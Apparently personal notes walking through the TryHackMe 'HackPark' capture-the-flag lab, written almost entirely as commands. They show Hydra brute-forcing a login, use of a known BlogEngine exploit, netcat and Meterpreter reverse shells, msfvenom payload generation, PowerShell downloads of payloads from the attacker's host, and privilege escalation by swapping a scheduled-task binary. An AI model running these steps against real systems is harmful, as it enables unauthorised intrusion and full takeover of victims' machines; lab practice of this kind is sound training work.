Skip to content

THM - HackPark

Deploy the vulnerable Windows machine

  • pennywise

Using Hydra to brute-force a login

gobuster dir --url http://10.10.117.53 -w directory-list-1.0.txt

http://10.10.117.53/admin

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.117.53 http-post-form "/Account/login.aspx:login=^USER^&password=^PASS^:F=failed"
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.117.53 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=bbKmJ9xxHdEFSouZb%2FJt114g7kbCU%2BaAQwAIi4deqUFdDc2%2BDOyfhbxPK%2B%2BNIs0jqf%2FsVfEDjsUlyqNHfV9qvtxjqKI%2Bxk0hB92SHyd%2FrMv8lSkz39MnOgI%2FZTUf8MkHtfySJo6nuN%2BfIreenhyC74kh2wscnkRKMUtwStKAYClr9zwW&__EVENTVALIDATION=HBnWUtjmHn9931oNnDtG22SHpD0NpHECaRk84HSrl2D8YcWVS9rjv5ZaHkUBaawrBI4SEK67XCSEm4PrceIrvncRurdqS7hnGAOprTQOqVT%2BCYiaQQdwX5Btmf1e3LIh%2BEAFsXzTN5jJFUTpssnZJ6jYywchAMPdrLGCkPjibCwERDvH&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:F=failed"

Compromise the machine

Admin login

login: admin password: 1qaz2wsx

CMS Version

3.3.6.0

Exploit for that version

CVE-2019-6714 https://www.exploit-db.com/exploits/46353

Place where exploit can be uploaded

10.10.117.53/admin/app/editor/editpost.cshtml

Set up listener

nc -nvlp 4443

Run revers shell

10.10.117.53/?theme=../../App_Data/files/

Get the shell

whoami

Windows Privilege Escalation

Generate payload with better shell

hacker machine

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.9.175 LPORT=4442 -f exe -o shell.exe

Expose shell.exe by local server

hacker machine

python3 -m http.server

Run lisener

msfconsole
msf6 > search multi handler
...
5   exploit/multi/handler
...
msf6 > use 5
msf6 exploit(multi/handler) > set LHOST 10.18.9.175
msf6 exploit(multi/handler) > set LPORT 4442
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

Get shell.exe

target machine

powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"

target machine

cd C:\Windows\Temp
dir
.\shell.exe

target machine

shell
powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
cd C:\Windows\Temp
dir
.\winPEAS.bat

target machine

meterpreter > cd "c:\Program Files (x86)\SystemScheduler"
meterpreter > cp Message.exe Message.exe.back
meterpreter > rm "c:\Program Files (x86)\SystemScheduler\Message.exe"
meterpreter > cd "c:\Windows\Temp"
meterpreter > cp shell.exe "c:\Program Files (x86)\SystemScheduler\Message.exe"
exit
run

now we should get root shell